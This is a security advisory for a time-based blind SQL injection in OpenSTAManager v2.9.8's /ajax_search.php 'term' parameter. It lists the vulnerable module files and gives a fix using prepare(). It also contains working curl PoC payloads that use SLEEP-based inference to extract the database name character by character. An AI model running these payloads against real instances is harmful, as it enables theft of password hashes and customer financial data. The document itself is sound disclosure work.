GHSA-4hc4-8599-xh2h

Summary

Critical Time-Based Blind SQL Injection vulnerability affecting multiple search modules in OpenSTAManager v2.9.8 allows authenticated attackers to extract sensitive database contents including password hashes, customer data, and financial records through time-based Boolean inference attacks with amplified execution across 10+ modules.

Status: ✅ Confirmed and tested on live instance (v2.9.8) Vulnerable Parameter: term (GET) Affected Endpoint: /ajax_search.php Affected Modules: Articoli, Ordini, DDT, Fatture, Preventivi, Anagrafiche, Impianti, Contratti, Automezzi, Interventi

Details

OpenSTAManager v2.9.8 contains a critical Time-Based Blind SQL Injection vulnerability in the global search functionality. The application fails to properly sanitize the term parameter before using it in SQL LIKE clauses across multiple module-specific search handlers, allowing attackers to inject arbitrary SQL commands and extract sensitive data through time-based Boolean inference.

Vulnerability Chain:

1. Entry Point: /ajax_search.php (Line 30-31)

   $term = get('term');
   $term = str_replace('/', '\\/', $term);
   

   The $term parameter undergoes minimal sanitization (only forward slash replacement).

2. Distribution: /src/AJAX.php::search() (Line 159-161)

   $files = self::find('ajax/search.php');
   array_unshift($files, base_dir().'/ajax_search.php');
   foreach ($files as $file) {
       $module_results = self::getSearchResults($file, $term);
   

   The unsanitized $term is passed to all module-specific search handlers.

3. Execution: /src/AJAX.php::getSearchResults() (Line 373)

   require $file;
   

   Each module's search.php file is included with $term variable in scope.

4. Vulnerable SQL Queries: Multiple modules directly concatenate $term without prepare()

All Affected Files (10+ vulnerable instances):

1. /modules/articoli/ajax/search.php - Line 51 (PRIMARY EXAMPLE)

   foreach ($fields as $name => $value) {
       $query .= ' OR '.$value.' LIKE "%'.$term.'%"';
   }
   $rs = $dbo->fetchArray($query);
   

   Impact: Direct concatenation without prepare(), allows full SQL injection.

2. /modules/ordini/ajax/search.php - Line 43, 47

   $query .= ' OR '.$value.' LIKE "%'.$term.'%"';
   $query .= '... WHERE `mg_articoli`.`codice` LIKE "%'.$term.'%" OR `mg_articoli_lang`.`title` LIKE "%'.$term.'%"';
   

3. /modules/ddt/ajax/search.php - Line 43, 47

   $query .= ' OR '.$value.' LIKE "%'.$term.'%"';
   

4. /modules/fatture/ajax/search.php - Line 45, 49

   $query .= ' OR '.$value.' LIKE "%'.$term.'%"';
   

5. /modules/preventivi/ajax/search.php - Line 45, 49

   $query .= ' OR '.$value.' LIKE "%'.$term.'%"';
   

6. /modules/anagrafiche/ajax/search.php - Line 62, 107, 162

   $query .= ' OR '.$value.' LIKE "%'.$term.'%"';
   

7. /modules/impianti/ajax/search.php - Line 46

   $query .= ' OR '.$value.' LIKE "%'.$term.'%"';
   

Properly Sanitized (NOT vulnerable): - /modules/contratti/ajax/search.php - Uses prepare() correctly - /modules/automezzi/ajax/search.php - Uses prepare() correctly

Note: The vulnerability has amplified execution - a single malicious request triggers SQL Injection across ALL vulnerable modules simultaneously, causing time-based attacks to execute 10+ times per request, multiplying the delay and leading to 504 Gateway Time-out errors as observed on the live demo instance.

<img width="1899" height="349" alt="image" src="https://github.com/user-attachments/assets/a6cc5a75-0f4e-4f49-a750-7ae72a363bbe" />

PoC

Step 1: Login

curl -c /tmp/cookies.txt -X POST 'http://localhost:8081/index.php?op=login' \
  -d 'username=admin&password=admin'

Step 2: Verify Vulnerability (Time-Based SLEEP)

# Test with SLEEP(1) - should take ~85+ seconds due to amplified execution
time curl -s -b /tmp/cookies.txt \
  'http://localhost:8081/ajax_search.php?term=%22%20AND%200%20OR%20SLEEP(1)%20OR%20%22'
# Result: real 72.29s

# Test with SLEEP(0) - should be fast
time curl -s -b /tmp/cookies.txt \
  'http://localhost:8081/ajax_search.php?term=%22%20AND%200%20OR%20SLEEP(0)%20OR%20%22'
# Result: real 0.30s

<img width="727" height="319" alt="image" src="https://github.com/user-attachments/assets/6022de5e-de91-4ebb-b02a-30358c31d96d" />

Step 3: Data Extraction - Database Name

# Extract first character of database name (expected: 'o' from 'openstamanager')
time curl -s -b /tmp/cookies.txt \
  "http://localhost:8081/ajax_search.php?term=%22%20AND%20SUBSTRING(DATABASE(),1,1)=%27o%27%20AND%20(SELECT%201%20FROM%20(SELECT(SLEEP(2)))a)%20OR%20%221%22=%221" \
  > /dev/null
# Result: real 170.32s

# Test with wrong character 'x' - should be fast
time curl -s -b /tmp/cookies.txt \
  "http://localhost:8081/ajax_search.php?term=%22%20AND%20SUBSTRING(DATABASE(),1,1)=%27x%27%20AND%20(SELECT%201%20FROM%20(SELECT(SLEEP(2)))a)%20OR%20%221%22=%221" \
  > /dev/null
# Result: real 0m0.30s

<img width="1364" height="349" alt="image" src="https://github.com/user-attachments/assets/a1d8a7d8-bb1a-49cd-8400-136ae5e359f1" />

Impact

Affected Users: All authenticated users with access to the global search functionality.

• Complete database exfiltration including customer PII, financial records, business secrets
• Extraction of password hashes for offline cracking
• Amplified time-based attacks consume 85x server resources per request

Recommended Fix:

Replace all instances of direct $term concatenation with prepare():

BEFORE (Vulnerable):

$query .= ' OR '.$value.' LIKE "%'.$term.'%"';

AFTER (Fixed):

$query .= ' OR '.$value.' LIKE '.prepare('%'.$term.'%');

Apply this fix to ALL affected files: 1. /modules/articoli/ajax/search.php - Line 51 2. /modules/ordini/ajax/search.php - Lines 43, 47, 79 3. /modules/ddt/ajax/search.php - Lines 43, 47, 83 4. /modules/fatture/ajax/search.php - Lines 45, 49, 85 5. /modules/preventivi/ajax/search.php - Lines 45, 49, 83 6. /modules/anagrafiche/ajax/search.php - Lines 62, 107, 162 7. /modules/impianti/ajax/search.php - Line 46